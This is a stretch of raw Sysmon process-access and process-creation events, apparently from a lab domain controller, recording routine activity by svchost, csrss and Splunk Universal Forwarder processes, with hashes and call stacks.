16:00:08.771{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028539Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.771{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028538Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.771{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028537Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.771{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5388-6008-8706-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028536Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.771{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5388-6008-8706-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028535Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.773{7901BC46-5388-6008-8706-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028534Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.005{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5388-6008-8606-00000000A301}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028533Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.005{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028532Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.005{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028531Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.005{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028530Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.005{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028529Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.005{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-5388-6008-8606-00000000A301}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028528Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.005{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5388-6008-8606-00000000A301}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028527Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.007{7901BC46-5388-6008-8606-00000000A301}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028551Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:09.552{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5389-6008-8806-00000000A301}7340C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028550Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:09.552{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028549Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:09.552{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028548Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:09.552{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028547Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:09.552{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028546Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:09.552{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-5389-6008-8806-00000000A301}7340C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028545Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:09.552{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5389-6008-8806-00000000A301}7340C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000028544Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:09.554{7901BC46-5389-6008-8806-00000000A301}7340C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000028587Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028586Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028585Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028584Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028583Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028582Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:10.662{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028581Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 